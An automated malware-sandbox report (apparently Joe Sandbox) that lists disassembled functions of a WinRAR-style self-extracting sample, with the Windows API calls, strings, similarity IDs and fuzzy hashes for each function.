                                                                                              • Opcode Fuzzy Hash: 5dceaeb8ef23ea4168d2ac290921857fc64c7ef8fc5f903534e4a9490e0944e0
                                                                                              • Instruction Fuzzy Hash: C8F0A0712003146B872AAF59FC45C8BB3EDEF89B50321092AFA45DB606D7B0F9408BF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032ED2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0032ED44
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0032ED80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: b0dfd80a5cb5f055e5ecc193712f075aebc00f4986dcab78f13dc8b2947f2f17
                                                                                              • Instruction ID: ced2e6e777d8821b7a3a22a5740facc6e6416cdc2b0c1d67a7cbacf48da85c6d
                                                                                              • Opcode Fuzzy Hash: b0dfd80a5cb5f055e5ecc193712f075aebc00f4986dcab78f13dc8b2947f2f17
                                                                                              • Instruction Fuzzy Hash: 55F037755012346BDB232B94AD07AEA769C9F26B41B000061FD4559056EA609980D6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033ABDA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction ID: 7586566faa2cdbbe8afbda4a21726ee4bc88cf118de9229432dde093613db28a
                                                                                              • Opcode Fuzzy Hash: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction Fuzzy Hash: 40A13672A04B869FDB27CF18C8E1BAEBBE5EF61310F19416DE4D59B281C6388D41C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00318D5C,?,?,?), ref: 0031B7F3
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00318D5C,?,?), ref: 0031B837
                                                                                              • SetFileTime.KERNEL32(?,00318AEC,?,00000000,?,00000800,?,00318D5C,?,?,?,?,?,?,?,?), ref: 0031B8B8
                                                                                              • CloseHandle.KERNEL32(?,?,00000800,?,00318D5C,?,?,?,?,?,?,?,?,?,?), ref: 0031B8BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: e373ddb5e5bd0b72eb70150452377477f06b3b9949d49634d267e1192934bb69
                                                                                              • Instruction ID: 110cab52e47a8c67ba208753fae1d9d4e88aa62f13608bcf720f51392ade6f94
                                                                                              • Opcode Fuzzy Hash: e373ddb5e5bd0b72eb70150452377477f06b3b9949d49634d267e1192934bb69
                                                                                              • Instruction Fuzzy Hash: 6641EE31248380AAE736DF24DC55BEBFBE8AF89740F04092DF5D1971D0D764AA88DB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003110E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: a2473fddc4e424a0ed1d8006408e1ce6225eaaa6facf7f018038794e31dd3408
                                                                                              • Instruction ID: 36645979c0b7659fe788b8660e8692e4543397e72fb34b2ca508b4aa7f865d32
                                                                                              • Opcode Fuzzy Hash: a2473fddc4e424a0ed1d8006408e1ce6225eaaa6facf7f018038794e31dd3408
                                                                                              • Instruction Fuzzy Hash: 0141C7719006295BCB569F689C499EEBBBCEF14310F040029FE45F7245DB70AD898BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00318532
                                                                                              • _wcslen.LIBCMT ref: 00318558
                                                                                              • _wcslen.LIBCMT ref: 003185EF
                                                                                              • _wcslen.LIBCMT ref: 00318657
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                                • Part of subcall function 0031B41F: RemoveDirectoryW.KERNEL32(?,?,?,00318649,?), ref: 0031B430
                                                                                                • Part of subcall function 0031B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00318649,?), ref: 0031B45E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 973666142-0
                                                                                              • Opcode ID: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction ID: b40d65b3b2afabff5e8f32b169caa13d9757dd96540edb550428929f653cfa2f
                                                                                              • Opcode Fuzzy Hash: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction Fuzzy Hash: 3A310672800254AACF2BAF608C41BEE736AEF5D780F154465F945AB149EF70DEC48B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033DB48 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0033A871,?,00000000,?,00000001,?,?,00000001,0033A871,?), ref: 0033DB95
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0033DC1E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003380B1,?), ref: 0033DC30
                                                                                              • __freea.LIBCMT ref: 0033DC39
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: dc4e9b884caf96f2f17235508c11bd76435e096cf1978cebb1944f876bbecec9
                                                                                              • Instruction ID: b06f7448df78924e477f930693304ea5093dbe1ee62876d3ebb9c9798d3827ff
                                                                                              • Opcode Fuzzy Hash: dc4e9b884caf96f2f17235508c11bd76435e096cf1978cebb1944f876bbecec9
                                                                                              • Instruction Fuzzy Hash: 06319271A1020AABDF269F64ECC5EAE7BA9EF44710F064268FC04DB150E735DD90CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00318704 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
                                                                                              • GetLastError.KERNEL32 ref: 00318759
                                                                                              • CloseHandle.KERNEL32(?), ref: 00318768
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                                                              • String ID:
                                                                                              • API String ID: 2767541406-0
                                                                                              • Opcode ID: c09dc30cc0ea66dcab74474492cfe44b52b2ae7da60a1589264d619b87aa7367
                                                                                              • Instruction ID: 77268686f27eddda08f1d33064924cf16ec7ed3e8d8d3d2e612dbc792c297c40
                                                                                              • Opcode Fuzzy Hash: c09dc30cc0ea66dcab74474492cfe44b52b2ae7da60a1589264d619b87aa7367
                                                                                              • Instruction Fuzzy Hash: 110119B5500209AFEB269FA0DD89FAEBB7CAB04744F204425B901E1190EB71DE94AA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032B673 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0032B676
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0032B685
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0032B693
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0032B6A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 481dc28eaafd3cf659d1c97e4b32932adc263061da80b8220929bf77ce1dc4cb
                                                                                              • Instruction ID: 24e2b6e0319a4e352b2b94b03ce79c63571211a50ff5b78eaf68a7b1b2e93590
                                                                                              • Opcode Fuzzy Hash: 481dc28eaafd3cf659d1c97e4b32932adc263061da80b8220929bf77ce1dc4cb
                                                                                              • Instruction Fuzzy Hash: 30E0EC72986F64ABD7361BA2BC1DB9A7F5CFB19713F450105F609962A0CAF044808FD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032B81C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0032B6A9: GetDC.USER32(00000000), ref: 0032B6AD
                                                                                                • Part of subcall function 0032B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0032B6B8
                                                                                                • Part of subcall function 0032B6A9: ReleaseDC.USER32(00000000,00000000), ref: 0032B6C3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0032B84C
                                                                                                • Part of subcall function 0032BADE: GetDC.USER32(00000000), ref: 0032BAE7
                                                                                                • Part of subcall function 0032BADE: GetObjectW.GDI32(?,00000018,?), ref: 0032BB16
                                                                                                • Part of subcall function 0032BADE: ReleaseDC.USER32(00000000,?), ref: 0032BBAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: 8ac0bb8220b98f715a8eaead7b40d1d93051868f93f546f3f41a9db070f43be1
                                                                                              • Instruction ID: aa03e07c64483a5dcb3b43b7fa7d7ed0bde0376823d9090c3ef05806d72d72b6
                                                                                              • Opcode Fuzzy Hash: 8ac0bb8220b98f715a8eaead7b40d1d93051868f93f546f3f41a9db070f43be1
                                                                                              • Instruction Fuzzy Hash: D291FF75608754AFD622DF25D844A2BBBFCFF89700F00492EF59AD7260DB70A841CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003180BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003180C3
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00318262
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: a22f28cc18c82ca87bebe227b4609c20421cb30aac30647965c5fb1fd8f99ca5
                                                                                              • Instruction ID: 64949ccfe43e48f553f9c23a0a1f71216cfe4b636efa37a198990078aee8db47
                                                                                              • Opcode Fuzzy Hash: a22f28cc18c82ca87bebe227b4609c20421cb30aac30647965c5fb1fd8f99ca5
                                                                                              • Instruction Fuzzy Hash: 4C514671800658AADB2BEB50CD56EEEB37DAF49300F1044A5B605AB092DB745FCACF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C67E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: 369cb429bc71c3dd78503259f40e84b399a41057d66855fc2f8ca3c3f5412808
                                                                                              • Instruction ID: 9ee7423cca82941246073d02983b1224da77d90af9710d91bb2d4fe13fd8e921
                                                                                              • Opcode Fuzzy Hash: 369cb429bc71c3dd78503259f40e84b399a41057d66855fc2f8ca3c3f5412808
                                                                                              • Instruction Fuzzy Hash: 572105729243265ED733EB68E845A6FB3ECDF85750F05142AF540CB141EB71ED488BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0031CDE7
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: 782c90190cd345d89981b1cd79cd275cfe5a1de3829147817c2bbe38fe44e590
                                                                                              • Instruction ID: 9533cda0d7a52546ca5b8dfad9ec6384e795ae0ff8a1d50149aa42cd5cf4061a
                                                                                              • Opcode Fuzzy Hash: 782c90190cd345d89981b1cd79cd275cfe5a1de3829147817c2bbe38fe44e590
                                                                                              • Instruction Fuzzy Hash: BA016D6309431175DA3B6B799C82DE7A7ACDF9D371B40841AF444CB081EA30D490C2B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00330D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00330DBD
                                                                                              • ___raise_securityfailure.LIBCMT ref: 00330EA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                              • String ID: x=7
                                                                                              • API String ID: 3761405300-2012613963
                                                                                              • Opcode ID: a2b6e37a66a8c38499abacc62d756baea9f1e429d5735ffbc9d4144eca3ee52d
                                                                                              • Instruction ID: 14ba8e26713421a4a263a617396d530ebbe8b1770eaf06ce7a1a7aa5452417ea
                                                                                              • Opcode Fuzzy Hash: a2b6e37a66a8c38499abacc62d756baea9f1e429d5735ffbc9d4144eca3ee52d
                                                                                              • Instruction Fuzzy Hash: B12194B6540300EED726CF59E9966907BE8EB48715F10502EE9488BAB0D3B1AAC1EF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032EEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(00020486), ref: 0032EF2A
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00020486,0032C460,?), ref: 0032EF65
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
